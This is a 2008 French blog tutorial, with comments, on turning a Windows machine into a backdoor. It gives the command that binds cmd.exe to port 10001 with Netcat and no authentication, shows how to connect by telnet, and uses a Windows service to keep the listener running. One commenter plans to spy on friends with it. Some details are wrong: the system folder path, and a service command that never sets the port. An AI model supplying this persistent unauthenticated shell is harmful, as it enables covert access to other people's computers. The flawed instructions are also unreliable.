Speak English? Click here to read my English blog!

Créer un accès distant sur une machine Windows

Posté par jbj le 7 fév 2008 dans Windows13 commentaires

Il est parfois très utile d'avoir un accès à distance (Backdoor) à une machine. Voici un petit truc utilisant Netcat, qui va vous permettre de vous connecter en Telnet sur une machine Windows, ou un serveur IIS, le tout sans aucune authentification.

Netcat est un utilitaire réseau open-source s'utilisant en ligne de commande. Il permet de faire pas mal de choses, comme ouvrir des connexions réseau, scanner des ports, etc.

Ici, nous allons nous interesser à la création d'un backdoor, c'est à dire un accès à distance à une machine hôte. Le but de ce tutorial est d'apprendre, et certainement pas de s'amuser à hacker le PC du voisin. Utilisez seulement ces infos sur vos machines en ayant conscience du risque de sécurité encouru: En effet, une fois la manipulation effectuée, n'importe qui pourra se connecter en Telnet sans authentification sur la machine en question. Vous voilà prévenus ;)

  • La première chose à faire est bien sûr de télécharger Netcat pour Windows.
  • Dézippez netcat dans le dossier %SYSTEMROOT%/System32
  • Executez netcat. Dans la console, saisissez:
nc -d -L -e cmd.exe -p 10001

Voici ce qui se passe en executant cette commande:

  • nc indique à windows d'éxecuter nc.exe avec les arguments suivants
  • -d indique à netcat de ne pas lire sur l'entrée standard.
  • -L indique à netcat de ne pas se fermer et d'attendre les connexions
  • -e Tells what program to run once the port is connected to (cmd.exe)
  • -p spécifie le port à utiliser

A partir de là, vous pouvez -à partir de n'importe quelle machine- vous connecter sur le poste Windows sur lequel nous avons effectué l'opération:

telnet X.X.X.X 10001

Bien entendu, X.X.X.X désigne l'adresse IP qui vous faut remplacer.

Maintenant, il faut savoir que dès que la machine hôte sera éteinte, netcat arrettera de tourner, et ne refonctionnera que si l'utilisateur relance le programme de lui-même.
Pour contrer celà, nous allons créer un service, qui est un programme tournant en arrière-plan de manière invisible.
Ouvrez la console d'administration Windows (Démarrer, Executer puis tapez cmd) et entrez la commande suivante:

sc create netcat binPath= c:\system32\netcat.exe start= auto

Désormais, Netcat tournera en arrière-plan dès l'ouverture de la session windows.

Tags: , ,

13 commentaires

» Flux RSS des commentaires
  1. Anonyme le 7 février 2008 à 11:28:

    Crer un accs distant sur une machine Windows…

    Il est parfois trs utile davoir un accs distance (Backdoor) une machine. Voici un petit truc utilisant Netcat, qui va vous permettre de vous connecter en Telnet sur une machine Windows, ou un serveur IIS, le tout sans aucune authentification….

  2. k3virus le 9 février 2008 à 0:15:

    Merci, grâce à toi je vais povoir espionner mes pote!

  3. jbj le 9 février 2008 à 10:23:

    Ce n’était pas vraiment le but du tuto, mais bon…

  4. blh_ika le 14 février 2008 à 15:47:

    bonjour tous et bonne fête les amoureux :o )
    juste une question : » Dézippez netcat dans le dossier %SYSTEMROOT%/System32… »
    où est ce dossier, sinon, faut-il le créer et dans quel répertoire ?
    merci

  5. jbj le 14 février 2008 à 16:04:

    Salut blh_ika;

    « %SYSTEMROOT% » est le nom qui définie la racine système, en l’occurence, la plupart du temps c’est C:\
    Ce qui nous donnes donc C:\System32

  6. blh_ika le 14 février 2008 à 16:19:

    merci d’avoir fait diligence :o )
    j ‘essaie donc.

  7. blh_ika le 14 février 2008 à 16:30:

    il n’y a que netstat qui tourne…
    nc est installé dans c:\windows\system32…
    et après ?

  8. jbj le 14 février 2008 à 16:34:

    Netstat? Normallement tu dois pouvoir te connecter en telnet sur la machine win.

  9. blh_ika le 14 février 2008 à 16:48:

    quand je suis sous cmd, j’ai ceci en ligne de commande:
    c:\documents and settingd\alpha
    (alpha est mon nom de session)
    je ne comprends pas comment acceder aux commandes de netcat

    :o (

  10. jbj le 14 février 2008 à 17:03:

    Si ma mémoire est bonne, il suufit que tu ailles dans c:/system32 et que tu cliques sur nc.exe (ou netcat.exe, je sais plus) et tu rentres la commande.
    Mais si tu ne connais pas le B-A-BA de la ligne de commande, tu va avoirdu mal a naviguer dans la machine distante via telnet, par contre.
    Bon courage :)

  11. neozus le 15 juin 2008 à 20:54:

    netcat étant placé dans c:\windows\system32 , je ne sais pas si ta commande vas fonctionner …

    De plus comment , le systéme peut connaitre le port a placer en écoute avec simplement :

    sc create netcat binPath= c:\system32\netcat.exe start= auto

    Merci pour tes précisions

  12. billabong_vb le 25 décembre 2008 à 23:37:

    Merci bcp Mon Ami ;) (f)

  13. Echos le 12 janvier 2009 à 9:26:

    bjr bjr !!
    je suis une tres grande inculte dans le domaine informatique
    est-ce que quelqu’un pourrait m’en dire plus sur les backdoors ainsi que leurs fonctionnements ??
    merci merci

Commenter